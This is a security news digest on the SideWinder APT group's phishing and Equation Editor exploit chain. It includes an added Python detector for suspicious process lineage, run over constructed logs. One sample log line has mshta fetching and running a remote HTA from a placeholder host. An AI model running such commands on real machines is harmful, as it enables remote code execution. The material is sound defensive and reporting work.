The SideWinder APT group, also known as T-APT-04 or Rattlesnake, has launched more than 1,000 new attacks since April 2020, a marked escalation for a group that began operating roughly a decade ago, The Hacker News reports.
SideWinder's attacks stand out not only in number and frequency but also in persistence: the group draws on a large arsenal of encrypted and obfuscated components, according to a Kaspersky report, which also noted the group's expanding target set and its use of the ongoing conflict between Russia and Ukraine as a lure in phishing campaigns.
The report also found SideWinder exploiting CVE-2017-11882, a remote code execution flaw in Microsoft Office's Equation Editor, to deploy its payload through a three-stage infection chain: an initial HTML Application (HTA) payload, a second-stage HTA component, and finally a .NET-based installer that establishes persistence and loads the backdoor. SideWinder has also used at least 400 domains and subdomains in its attacks since 2020.
"This threat actor has a relatively high level of sophistication using various infection vectors and advanced attack techniques," said Kaspersky's Noushin Shabab.
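The infection chain above (Equation Editor exploitation leading to HTA stages and then an installer) leaves a recognisable parent/child process pattern on the endpoint. The following is an added detection example, not code from Kaspersky or the report: it runs three process-lineage rules over constructed Sysmon-style process-creation records. It assumes only two facts that are independent of SideWinder, namely that EQNEDT32.EXE is the Equation Editor binary affected by CVE-2017-11882 and that mshta.exe is the Windows host for HTA files; the log format, PIDs, paths and URLs are all constructed for the example.

```python
"""Detect the Equation Editor -> HTA -> installer chain in process logs.

Added example. The log format below is constructed (pipe-delimited
"timestamp|pid|ppid|image|cmdline"); real deployments would read Sysmon
Event ID 1 or EDR process-creation telemetry instead.
"""
from dataclasses import dataclass
from typing import Dict, List

# EQNEDT32.EXE is the Equation Editor executable that CVE-2017-11882 affects;
# mshta.exe is the Windows host that executes HTML Application (.hta) files.
EQNEDT = "eqnedt32.exe"
MSHTA = "mshta.exe"
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed sample telemetry (not real SideWinder data): Word spawns the
# Equation Editor, which spawns mshta, which chains a second HTA and an installer.
SAMPLE_LOG = r"""
2022-05-30T10:01:02Z|4120|3300|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|WINWORD.EXE /n invoice.docx
2022-05-30T10:01:05Z|4188|4120|C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|EQNEDT32.EXE -Embedding
2022-05-30T10:01:06Z|4210|4188|C:\Windows\System32\mshta.exe|mshta.exe http://stage.example.invalid/1.hta
2022-05-30T10:01:09Z|4233|4210|C:\Windows\System32\mshta.exe|mshta.exe C:\Users\Public\2.hta
2022-05-30T10:01:12Z|4250|4233|C:\Users\Public\installer.exe|installer.exe
2022-05-30T10:05:00Z|5001|3300|C:\Windows\System32\notepad.exe|notepad.exe
"""


@dataclass(frozen=True)
class Event:
    ts: str
    pid: int
    ppid: int
    image: str   # full image path as logged
    cmdline: str

    @property
    def name(self) -> str:
        """Lower-cased file name of the image, for case-insensitive matching."""
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Event]:
    """Parse the constructed pipe-delimited process-creation lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        events.append(Event(ts, int(pid), int(ppid), image, cmdline))
    return events


def find_suspicious(events: List[Event]) -> List[str]:
    """Return one alert string per event that matches a lineage rule."""
    by_pid: Dict[int, Event] = {e.pid: e for e in events}
    alerts: List[str] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pname = parent.name if parent else ""
        if pname == EQNEDT:
            # Rule 1: Equation Editor has no legitimate reason to spawn children.
            alerts.append(f"pid {e.pid}: {e.name} spawned by EQNEDT32.EXE")
        elif e.name == MSHTA and pname in OFFICE:
            # Rule 2: an Office application launching the HTA host directly.
            alerts.append(f"pid {e.pid}: mshta.exe spawned by Office app {pname}")
        elif pname == MSHTA:
            # Rule 3: the HTA host launching a further stage (another HTA or an installer).
            alerts.append(f"pid {e.pid}: {e.name} spawned by mshta.exe")
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(parse_events(SAMPLE_LOG)):
        print(alert)
```

Rule 1 alone is the high-signal one: EQNEDT32.EXE is an out-of-process COM server that should only ever be a leaf in the process tree, so any child is worth an alert regardless of its name. Rules 2 and 3 are noisier on hosts where HTA-based line-of-business tools exist and would normally be tuned with an allowlist of known HTA paths.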
Mounting security alert fatigue has prompted Torq to introduce HyperSOC, a new system built on its Hyperautomation Platform that uses artificial intelligence to automate, manage, and monitor security operations center response, with the aim of speeding the investigation and remediation of threats, SiliconAngle reports.
Moldovan botnet operator Alexander Lefterov, also known as Alipatime, Alipako, and Uptime, has been indicted by the U.S. Department of Justice for his involvement in widespread attacks against U.S.-based computers, BleepingComputer reports.